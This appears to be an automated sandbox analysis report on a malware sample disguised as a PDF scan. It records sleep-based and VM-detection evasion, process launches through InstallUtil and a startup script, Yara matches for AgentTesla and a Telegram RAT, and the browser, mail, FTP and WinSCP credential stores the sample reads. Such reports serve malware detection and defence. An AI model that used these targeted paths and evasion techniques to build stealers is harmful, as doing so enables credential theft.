                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -99874s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -99765s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6716Thread sleep count: 4512 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -99656s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -99547s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -99437s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -99328s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -99218s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -99109s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -99000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -98890s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -98781s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -98671s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -98562s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -98453s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -98343s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -98233s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -98125s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -98014s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -97901s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -97797s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -97687s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -97497s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -97386s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -97250s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -97140s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -97031s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -96922s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -96812s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -96703s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 99839Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 99719Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 99609Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 99500Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 99391Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 99281Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 99172Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 99063Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 98930Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 98813Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 98703Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 98586Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 98465Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 98355Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 98203Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 98077Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 97957Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 97750Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 97632Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 97492Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 97375Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 97266Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 97156Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 97047Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 96938Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 96813Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 96703Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 96594Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 96469Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 96359Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 96250Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 96140Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 96031Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 95922Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 95812Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 95703Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 95594Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 95469Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 95359Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 95250Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 95129Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 95013Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 94887Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 94700Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 94500Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 94391Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 94266Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 94141Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 94031Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 93922Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 99874Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 99765Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 99656Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 99547Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 99437Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 99328Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 99218Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 99109Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 99000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 98890Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 98781Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 98671Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 98562Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 98453Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 98343Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 98233Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 98125Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 98014Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 97901Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 97797Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 97687Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 97497Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 97386Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 97250Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 97140Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 97031Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 96922Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 96812Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 96703Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: wscript.exe, 00000004.00000002.2406414720.000002A3D5DE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: InstallUtil.exe, 00000002.00000002.2468447335.00000000055D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
                      Source: Guid.exe, 00000005.00000002.2451764397.0000000003018000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: wscript.exe, 00000004.00000002.2406414720.000002A3D5DE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: Guid.exe, 00000005.00000002.2451764397.0000000003018000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2260543550.0000000000F15000.00000004.00000020.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2449757865.000000000137B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: InstallUtil.exe, 00000006.00000002.3438981636.0000000005BB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllkk
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Guid.exe "C:\Users\user\AppData\Roaming\Guid.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeQueries volume information: C:\Users\user\Desktop\rScan_0984829339_PDF.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeQueries volume information: C:\Users\user\AppData\Roaming\Guid.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Guid.exe.40bbf88.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Guid.exe.40bbf88.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.rScan_0984829339_PDF.exe.3e96b78.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.rScan_0984829339_PDF.exe.3e96b78.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2280814775.0000000003E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2453773157.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2451764397.00000000033C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2262633916.0000000002F85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2482319443.00000000040A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2453773157.0000000002FBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3430262414.00000000028DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3430262414.00000000028BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2449463464.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2280814775.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2453773157.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3430262414.0000000002871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rScan_0984829339_PDF.exe PID: 6272, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Guid.exe PID: 5588, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6708, type: MEMORYSTR
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Guid.exe.40bbf88.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Guid.exe.40bbf88.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.rScan_0984829339_PDF.exe.3e96b78.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.rScan_0984829339_PDF.exe.3e96b78.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2280814775.0000000003E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2451764397.00000000033C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2262633916.0000000002F85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2482319443.00000000040A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2449463464.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2280814775.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2453773157.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3430262414.0000000002871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rScan_0984829339_PDF.exe PID: 6272, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Guid.exe PID: 5588, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6708, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Guid.exe.40bbf88.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Guid.exe.40bbf88.2.raw.unpack, type: UNPACKEDPE
